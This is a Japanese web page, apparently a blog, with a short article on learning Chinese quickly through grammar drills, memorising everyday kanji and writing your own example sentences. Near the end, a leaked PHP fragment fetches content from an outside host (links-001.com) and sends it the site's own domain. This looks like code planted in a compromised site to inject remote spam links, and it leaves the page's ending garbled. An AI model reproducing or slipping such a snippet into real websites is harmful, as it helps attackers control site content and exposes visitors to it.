前へ
次へ

じっくりと中国語の学習を進めたいなら

基本的に、中国語の発音はかなり難しいので、独学で全て終わらせるのはほぼ不可能です。それを考えると、ど

more

仕事と上手に中国語の学習をしませんか

中国が好きで、中国語を学習したいという人がいますが、仕事が忙しくて中々習いに行けないという人がいます

more

工夫して行いたい中国語の学習

かなり多くのところで中国語の学習ができる今は、ちょっとした工夫をすれば効率よく身に付けていくことがで

more

中国語を短期間で身につける学習方法

世界で多くの国が公用語としている英語と同じように、中国語を学習する人はとても増えてきています。理由として中国自体は日本にとってとても身近な国であり、仕事で携わる事が多い国の1つでもあるという点が大きいです。また中国自体は観光地として人気が多く短時間で旅行に行く事ができるという点で、会話に困らないように中国語を身につけたいという人も多いという理由があります。では実際に中国の言語を勉強する方法はいくつもありますが、その中でも短期間で覚えたいという場合はポイントを抑えて学習することが望ましいです。まず1つ目のポイントとして文法を徹底して覚えるという方法があります。日本語も普段話しをする時に意識はしていませんが、文法にのっとって会話しています。同じように中国語もいくつもの文法があり、それらを応用して会話を行っています。そのため基本となる文法は一度覚えておくことで、応用して活用することが可能になります。また会話するためには最低でも文法にそって利用しないと相手に通じないので、しっかりと必要な文法は丸暗記するつもりで全て覚えるようにします。2つ目のポイントになるのが漢字を覚えるという点があります。日本語の場合は漢字を使用していますが、分からない場合はひらがなで表現することは可能です。ですが中国では漢字のみしか使用されていないので、1つの漢字を忘れた事で言葉が成立しないという事も出てきます。そんため膨大な感じの中でも普段日常で使われる漢字を中心として、全て覚えるように勉強することが大切になります。最後に覚えた文法と漢字を活用して、自分自身で例文を作成してみる方法になります。自分で実際に文法を使って例文を作ると、完成して読み直すことで改めて読み返してあっているかどうかを確認する事になります。例文を作る過程とあっているかの確認作業の2工程を踏むことで、何度も読み返すことになり結果として自分自身に早く身に付く事に繋がります。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top